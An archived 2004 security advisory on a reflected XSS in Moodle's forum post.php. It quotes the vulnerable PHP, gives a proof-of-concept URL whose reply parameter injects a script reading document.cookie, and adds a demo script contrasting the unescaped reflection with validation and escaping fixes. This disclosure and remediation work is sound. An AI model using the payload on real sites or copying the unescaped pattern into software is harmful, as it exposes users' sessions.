SECURITYVULNS:DOC:6591
Published: Aug 09, 2004 (vulners.com)

xss in moodle (post.php)

+--------------------------------+
|                                |
| XSS in Moodle < 1.3 (post.php) |
|                                |
+--------------------------------+

Author: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04

Software Description:


"Moodle is a course management system (CMS) - a software package designed to help educators
create quality online courses."
www.moodle.org

Bug:
~~~

post.php (mod/forum/post.php) is vulnerable to a reflected XSS attack.
The bug is in the handling of the $reply variable:

/* Start of vulnerable code */

    } else if (isset($reply)) {      // User is writing a new reply

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");   // $reply is echoed back unescaped
        }
        if (! $discussion = get_record("forum_discussions", "id", $parent->discussion)) {
            error("This post is not part of a discussion! ($reply)");
        }
        if (! $forum = get_record("forum", "id", $discussion->forum)) {
            error("The forum number was incorrect ($discussion->forum)");
        }
        if (! $course = get_record("course", "id", $discussion->course)) {
            error("The course number was incorrect ($discussion->course)");
        }

        if (! forum_user_can_post($forum)) {
            error("Sorry, but you can not post in this forum.");
        }

        if ($cm = get_coursemodule_from_instance("forum", $forum->id, $course->id)) {
            if (groupmode($course, $cm) and !isteacheredit($course->id)) {   // Make sure user can post here
                if (mygroupid($course->id) != $discussion->groupid) {
                    error("Sorry, but you can not post in this discussion.");
                }
            }
            if (!$cm->visible and !isteacher($course->id)) {
                error(get_string("activityiscurrentlyhidden"));
            }
        }

/* End of vulnerable code */

Here is the bug:

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");
        }

$reply is taken from the request without any validation that it is a post ID. When the
lookup fails, the attacker-controlled value is interpolated into the error message and
error() prints it as HTML without escaping, so a crafted reply parameter executes script
in the browser of whoever follows the link.

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E
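
The pattern above, reduced to a stand-alone PHP script, as an added example (this is not the
advisory's or Moodle's code): the vulnerable reflection beside two fixes, validating $reply as
an integer at the trust boundary and escaping at the output sink. The helpers lookup_post(),
error_vulnerable() and error_escaped() are assumed stand-ins for forum_get_post_full() and
Moodle's error(); the payload is the advisory's, URL-decoded as it would arrive in $reply.

```php
<?php
// Added example, not code from the advisory or from Moodle.
// Assumptions: lookup_post() stands in for forum_get_post_full() and always fails,
// and error_vulnerable()/error_escaped() stand in for Moodle's error() page.

function lookup_post($id) {
    // No posts exist in this demo, so the failing branch (the one that echoes $reply) is always taken.
    return false;
}

// As in post.php: the message is dropped into the HTML untouched.
function error_vulnerable($message) {
    return "<p class=\"error\">$message</p>";
}

// The vulnerable flow: attacker-controlled $reply reaches the page body unescaped.
function handle_reply_vulnerable($reply) {
    $parent = lookup_post($reply);
    if (!$parent) {
        return error_vulnerable("Parent post ID was incorrect ($reply)");
    }
    return "ok";
}

// Fix 1: validate at the trust boundary. A post id is a positive integer, so reject
// anything else before it is used, and never echo the rejected value back.
function handle_reply_validated($reply) {
    if (!ctype_digit((string)$reply)) {
        return error_vulnerable("Parent post ID was incorrect");
    }
    $reply = (int)$reply;
    $parent = lookup_post($reply);
    if (!$parent) {
        return error_vulnerable("Parent post ID was incorrect ($reply)"); // only an integer can reach here
    }
    return "ok";
}

// Fix 2: escape at the sink, so error() is safe regardless of what callers interpolate.
function error_escaped($message) {
    return '<p class="error">' . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . '</p>';
}

function handle_reply_escaped($reply) {
    $parent = lookup_post($reply);
    if (!$parent) {
        return error_escaped("Parent post ID was incorrect ($reply)");
    }
    return "ok";
}

// The advisory's payload, URL-decoded as PHP would present it in $reply.
$payload = '<script>alert(document.cookie);</script>';

echo handle_reply_vulnerable($payload), "\n";  // script tag survives intact
echo handle_reply_validated($payload), "\n";   // value rejected, nothing reflected
echo handle_reply_escaped($payload), "\n";     // <script> is emitted as &lt;script&gt;, rendered as text
```

Run it with `php demo.php` and compare the three lines. In a real fix you want both layers:
the type check stops a non-numeric id from ever reaching a database query or a message, and
escaping in error() protects every other caller that interpolates user data into a message.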

Solution: 
~~~~~~~~~
Upgrade to Moodle 1.3 or later.

Vendor Status:
~~~~~~~~~~~~~~
Notified.

Credits:
~~~~~~~~
Bug found by Javier Ubilla and Ariel.